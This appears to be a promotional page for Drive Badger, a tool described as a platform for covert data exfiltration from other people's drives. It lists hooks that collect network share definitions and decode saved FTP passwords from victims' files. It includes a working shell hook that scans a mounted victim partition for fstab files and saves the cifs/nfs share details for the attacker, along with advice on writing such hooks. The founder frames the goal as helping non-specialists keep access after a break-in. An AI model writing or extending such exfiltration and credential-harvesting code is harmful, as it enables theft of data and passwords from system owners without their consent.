Drive Badger: open source platform for covert data exfiltration operations, ranging from small computers to big servers.

contact@drivebadger.com

Each partition that Drive Badger recognizes during an attack is passed, between mount and rsync, through a series of hooks. Hooks are functional plugins, cloned into the /opt/drivebadger/hooks directory, that process the given filesystem in a more intelligent way than just copying all of its data.

Available hooks

  • hook-fstab - looks for /etc/fstab files, extracts all statically defined smbfs/cifs and nfs shares, and exfiltrates them
  • hook-wcxftp - looks for Total Commander's wcx_ftp.ini files with saved FTP passwords, extracts and decodes the passwords, and exfiltrates the FTP accounts

Writing new hooks

You can implement your own hooks. Each hook repository must contain a hook.sh script that accepts 2 arguments:

  • source path (where the partition is mounted)
  • target root directory (where the exfiltrated data should be written)
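As an added illustration of that two-argument contract (example code written for this page, not the project's own hook-fstab), the script below walks the mounted partition for etc/fstab files, keeps only the cifs/smbfs/nfs entries, and writes a short report under the target root. The hook-fstab subdirectory under the target root, the decision to skip empty reports, and the choice to match fstab files at any depth (so chroots and container images on the same partition are covered) are assumptions of this example, not behaviour the page describes.

```shell
#!/bin/sh
# Example hook.sh for Drive Badger (illustration only, not the project's hook-fstab).
# Contract from the page: hook.sh <source path (mounted partition)> <target root directory>.

# Print the network shares declared in one fstab file, one per line, as
#   <fstype> <remote source> <mount point>
# Comments, malformed lines and local filesystems are skipped. fstab fields are
# whitespace separated: fs_spec fs_file fs_vfstype fs_mntops fs_freq fs_passno.
extract_shares() {
    awk '
        /^[[:space:]]*#/ { next }
        NF < 3           { next }
        $3 ~ /^(cifs|smbfs|nfs|nfs4)$/ { print $3, $1, $2 }
    ' "$1"
}

# Walk the mounted partition ($1) for etc/fstab files and write the extracted
# shares under the target root ($2). The relative path is preserved so reports
# from several partitions (or from a chroot on the same partition) do not collide.
# find does not follow symlinks without -L, so a hostile symlink on the victim
# filesystem cannot redirect the hook to files on the attacking device.
run_hook() {
    src=$1
    dst=$2
    find "$src" -type f -path '*/etc/fstab' 2>/dev/null | while read -r fstab; do
        rel=${fstab#"$src"}
        rel=${rel#/}
        out="$dst/hook-fstab/$rel"
        mkdir -p "$(dirname "$out")"
        extract_shares "$fstab" > "$out"
        # Drop empty reports so the operator only sees partitions that had shares.
        if [ ! -s "$out" ]; then
            rm -f "$out"
        fi
    done
}

# Run only when invoked the way Drive Badger calls hooks: hook.sh <source> <target>.
case $# in
    2) run_hook "$1" "$2" ;;
esac
```

Two practical points for any hook: every path it touches comes from an untrusted filesystem, so quote all expansions and never follow symlinks into the host, and keep the hook's output under the target root it was given rather than writing elsewhere on the device.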

From the founder...

Having been in the IT security business for almost 25 years, I have realized that breaking protections (or preventing it) is becoming less and less important. We are not living in Outlook Express times anymore...
The key point is the ability to keep privileges permanently, once obtained. This becomes more and more difficult as IT systems get more and more complicated, and this is exactly the goal of the Drive Badger project: to give non-ITSEC people the ability to keep either the privileges or the outcome of a successful break-in.